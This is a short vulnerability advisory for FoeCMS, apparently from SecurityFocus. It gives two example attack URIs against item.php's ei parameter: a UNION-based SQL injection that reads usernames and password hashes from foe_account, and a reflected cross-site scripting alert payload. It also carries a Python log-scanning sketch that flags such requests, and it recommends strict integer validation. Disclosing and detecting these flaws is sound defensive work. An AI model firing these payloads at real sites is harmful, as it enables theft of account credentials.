FoeCMS Cross Site Scripting and SQL Injection Vulnerabilities

An attacker can exploit these issues with a browser. To exploit the cross-site scripting issue, the attacker must trick an unsuspecting victim into following a malicious URI.

The following example URIs are available:

SQL-injection:

http://www.example.com/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--

Cross-site scripting:

http://www.example.com/[path]/item.php?ei=<script>alert(1)</script>
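Both example URIs abuse the same `ei` parameter of item.php, so a single strict check on that parameter flags either one in web server logs. The following Python sketch is an added example, not part of the original advisory or of FoeCMS. It assumes that legitimate `ei` values are small positive integers and that logs use the common combined format; the `/cms/` path, the client addresses and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); /cms/ is a placeholder path.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /cms/item.php?ei=42 HTTP/1.1" 200 5120
198.51.100.8 - - [01/Jan/2010:10:00:05 +0000] "GET /cms/item.php?ei=-1%20union%20select%201,username,pass_sha,1,1,1,1,1,1%20from%20foe_account-- HTTP/1.1" 200 733
198.51.100.9 - - [01/Jan/2010:10:00:09 +0000] "GET /cms/item.php?ei=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 688
198.51.100.7 - - [01/Jan/2010:10:00:12 +0000] "GET /cms/index.php?page=2 HTTP/1.1" 200 2048
"""

VALID_EI = re.compile(r"\d{1,10}")  # assumption: item ids are small positive integers
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SQL_HINT = re.compile(r"\b(union|select|from)\b|--", re.I)  # triage hint only
MARKUP_HINT = re.compile(r"[<>\"']")                        # triage hint only

def classify_ei(value):
    """Return None for a well-formed id, otherwise a triage label."""
    if VALID_EI.fullmatch(value):
        return None
    if SQL_HINT.search(value):
        return "sql-syntax"
    if MARKUP_HINT.search(value):
        return "markup"
    return "non-numeric"

def scan(log_text):
    """Return (client_ip, label, decoded_value) for each suspicious item.php request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/item.php"):
            continue
        # parse_qs percent-decodes the value, so encoded payloads are compared in clear
        for value in parse_qs(url.query, keep_blank_values=True).get("ei", []):
            label = classify_ei(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}  {label:12}  {value!r}")
```

The allowlist decides whether a request is flagged; the keyword and markup patterns only label it for triage. The same integer-only check applied inside the application before `ei` reaches the query or the page output rejects both example requests.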


 

Copyright 2010, SecurityFocus